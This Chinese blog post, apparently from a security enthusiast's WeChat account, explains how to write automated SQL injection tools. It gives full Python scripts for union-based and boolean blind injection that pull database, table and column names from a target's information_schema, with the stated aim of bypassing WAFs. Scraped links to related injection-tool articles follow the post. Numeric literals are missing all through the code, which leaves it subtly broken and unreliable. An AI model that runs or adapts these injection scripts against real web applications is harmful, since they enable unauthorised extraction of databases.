0x01  前言

  一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。

0x02 SQL注入工具

A、联合查询

union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思路:获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--查询这个表下所有列名。

代码详情:

#! /usr/bin/env python

# _*_  coding:utf- _*_

import requests

import urllib

import re

values={}

def get(url,values):

    data = urllib.urlencode(values)

    geturl = url+'?'+data

    response = requests.get(geturl)

    result=response.content

    find_list=re.findall(r"qwe~(.+?)~qwe", result)

    if len(find_list)>:

        return find_list

def get_database_name(url):

    values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"

    name_list=get(url,values)

    print 'The databases:'

    for i in name_list:

        print i+" ",

    print "\n"

def table_name(url):

    database_name=raw_input('please input your database:')

    values['id'] = "1  union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"'"+database_name+"'"

    name_list=get(url,values)

    print 'The table is :'

    for i in name_list:

        print i+" ",

    print "\n"

def column_name(url):

    table_name=raw_input('please input your table:')

    values['id'] = "1   union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"'"+table_name+"'"

    name_list=get(url,values)

    print 'The column is :'

    for i in name_list:

        print i+" ",

if __name__ == '__main__':

    url='http://192.168.106.130/config/sql.php'

    get_database_name(url)

    table_name(url)

    column_name(url)

运行效果:

B、盲注

  盲注的脚本,但总感觉代码不过简洁,越简单越好,可以把局部代码直接拿出来用,简单修改payload就可以获取数据,基于布尔盲注,GET,写的一个简单的注入脚本。

主要思路:获取当前数据库名--选择数据库--获取这个数据库有几个表--依次获取每个表的长度--依次获取获取表名--依次获取每个表的长度、列名。

#! /usr/bin/env python

# _*_  coding:utf- _*_

import requests

import urllib

import time

start_time = time.time()

def database_length(url):

    values={}

    for i in range(,):

        values['id'] = "1 and (select length(database()))=%s" %i

        data = urllib.urlencode(values)

        geturl = url+'?'+data

        response = requests.get(geturl)

        if response.content.find('qwertyasd')>:

            return i

def database_name(url):

    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

    values={}

    databasename= ''

    aa =

    aa = database_length(url)

    for i in range(, aa+):

        for payload in payloads:

            values['id'] = "1 and ascii(substring(database(),%s,1))=%s " %(i,ord(payload))

            data = urllib.urlencode(values)

            geturl = url+'?'+data

            response = requests.get(geturl)

            if response.content.find('qwertyasd')>:

                databasename += payload

    return databasename

#print database_name('http://192.168.125.129/config/sql.php')

def table_count(url,database):

    values={}

    for i in range(,):

        values['id'] = "1 and (select count(table_name) from information_schema.tables where table_schema="+"'"+database+"')"+"=%s" %i

        data = urllib.urlencode(values)

        geturl = url+'?'+data

        response = requests.get(geturl)

        if response.content.find('qwertyasd')>:

            return i

def table_length(url,a,database):

    values={}

    for i in range(,):

        values['id'] = "1 and (select length(table_name) from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1)=%s" %(a,i)

        data = urllib.urlencode(values)

        geturl = url+'?'+data

        response = requests.get(geturl)

        if response.content.find('qwertyasd')>:

            return i

def table_name(url,database):

    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

    values={}

    table_name=[]

    bb = table_count(url,database)

    for i in range(,bb+):

        user= ''

        cc=table_length(url,i,database)

        if cc==None:

            break

        for j in range(,cc+):

            for payload in payloads:

                values['id'] = "1 and ascii(substring((select table_name from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1),%s,1))=%s " %(i,j,ord(payload))

                data = urllib.urlencode(values)

                geturl = url+'?'+data

                response = requests.get(geturl)

                if response.content.find('qwertyasd')>:

                    user += payload

                    #print payload

        table_name.append(user)

    return table_name

#print table_name('http://192.168.125.129/config/sql.php','test')

def column_count(url,table_name):

    values={}

    for i in range(,):

        values['id'] = "1 and (select count(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+")=%s" %i

        data = urllib.urlencode(values)

        geturl = url+'?'+data

        response = requests.get(geturl)

        if response.content.find('qwertyasd')>:

            return i

def column_length(num,url,table_name):

    values={}

    for i in range(,):

        limit = " limit %s,1)=%s" %(num,i)

        values['id'] = "1 and (select length(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+limit

        data = urllib.urlencode(values)

        geturl = url+'?'+data

        response = requests.get(geturl)

        if response.content.find('qwertyasd')>:

            return i

def column_name(url,table_name):

    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

    values={}

    column_name=[]

    dd=column_count(url,table_name)

    for i in range(,dd+):

        user= ''

        bb=column_length(i,url,table_name)

        if bb==None:

            break

        for j in range(,bb+):

            for payload in payloads:

                limit=" limit %s,1),%s,1))=%s" %(i,j,ord(payload))

                values['id'] = "1 and ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit

                data = urllib.urlencode(values)

                geturl = url+'?'+data

                response = requests.get(geturl)

                if response.content.find('qwertyasd')>:

                    user += payload

        column_name.append(user)

    return column_name

#print column_name('http://192.168.125.129/config/sql.php','admin')

if __name__ == '__main__':

    url='http://192.168.125.129/config/sql.php'

    databasename=database_name(url)

    print "The current database:"+databasename

    database=raw_input("Please input your databasename: ")

    tables=table_name(url,database)

    print database+" have the tables:",

    print tables

    for table in tables:

        print table+" have the columns:"

        print column_name(url,table)

    print 'Use for: %d second' % (time.time() - start_time)

运行效果:

0x03 END

  通过编写简单的SQL注入脚本来获取数据,脚本实现得很简单,扩展空间还很大,只为以最简单的方式来Bypass WAF数据获取。

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

如何编写一个SQL注入工具的更多相关文章

  1. 十大关系数据库SQL注入工具一览

    摘要:众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞. BSQL Hacker ...

  2. 10个SQL注入工具(转载)

    众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞. BSQL Hacker 1 ...

  3. 10 个 SQL 注入工具

    BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出 ...

  4. SQL注入工具实践

    程序简介 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入. ...

  5. sql注入工具:sqlmap命令

    sqlmap是一款专业的sql注入工具, 让你告别人工注入, 程序高效自动注入 前提是你有找到注入点 , 工具的官方网站:http://sqlmap.org/ kali系统默认安装sqlmap, 不需 ...

  6. 详解强大的SQL注入工具——SQLMAP

    1. 前言  Windows下的注入工具好的又贵,免费的啊D.明小子等又不好用,我们根本没必要花 时间去找什么破解的havij.pangolin什么的,特别是破解的工具很可能被绑了木马.其实 Linu ...

  7. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  8. 自动化SQL注入工具 sqlmap 使用手册

    0x00 sqlmap介绍 什么是sqlmap? sqlmap是一个开源的渗透测试工具,它自动化了检测和利用SQL注入缺陷 以及接管数据库服务器的过程.它配备了一个强大的检测引擎 ,以及终极渗透测试仪 ...

  9. sql注入工具sqlmap使用参数说明

    Options(选项):--version 显示程序的版本号并退出-h, --help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为1)Target(目标):以下至少需要设置其中 ...

随机推荐

  1. Sword STL仿函数示例

    一元函数 unary_function .有返回值. .只有一个参数. template <class Arg, class Result> struct unary_function { ...

  2. SSH-CLIENT : gSTM

    Linux环境下可以使用终端命令行直接登录SSH帐号.但是对Linux新手,可能不太习惯用命令行,于是我就琢磨找一款Linux环境下可以图形化管理ssh帐号的客户端软件,还真让我找着了. gSTM,是 ...

  3. Android下ListView上下滑动背景变黑

    老问题,Google一下就能找到N多答案,为方便自己日后查阅,记录如下: 手指在ListView上下滚动时,ListViewItem背景变黑,因为在滚动的时候为了提升性能做了优化,为提高滚动的性能,A ...

  4. python进行数据分析----线性回归

    线性回归分析: 方法: import statsmodels.api as sm import pandas as pd from patsy.highlevel import dmatrices - ...

  5. windows sever2003安装Wamp 2.5不成功——VC 11不支持Windows Server 2003和win XP?

    Windows Server 2003 安装Wamp 2.5不成功Wampserver 2.5 will not run on Windows XP 报错信息:C:\wamp\bin\apache\a ...

  6. 解决Eclipse代码分析插件SonarLint在Console输出乱码问题

    在Eclipse安装目录下的eclipse.ini文件末尾加上一行   -Dfile.encoding=UTF-8   即可.

  7. Lemon OA第4篇:常用功能

    OA,Office Automation的简写,中文意思办公自动化,不同的人有不同的见解,可以简单的理解为网络化办公,高效.协同是其显著的特点,如今正在朝着智能的方向发展 平时不擅长文字,写出来几句话 ...

  8. linux rinetd 端口转发部署

    linux下简单好用的工具rinetd,实现端口映射/转发/重定向 Rinetd是为在一个Unix和Linux操作系统中为重定向传输控制协议(TCP)连接的一个工具.Rinetd是单一过程的服务器,它 ...

  9. 转 linux 权限

    发布系统架构图简化如下: 管理员通过Jenkins调用“发布程序(代号varian,以下简称varian)”,发布程序会进行一系列的初始化操作,完成后生成Docker镜像上传到Docker仓库,容器集 ...

  10. 浏览器兼容css

    原文:https://www.cnblogs.com/shizk/p/8459362.html 1.为什么会出现浏览器兼容问题? 由于各大主流浏览器由不同的厂家开发,所用的核心架构和代码也很难重和,这 ...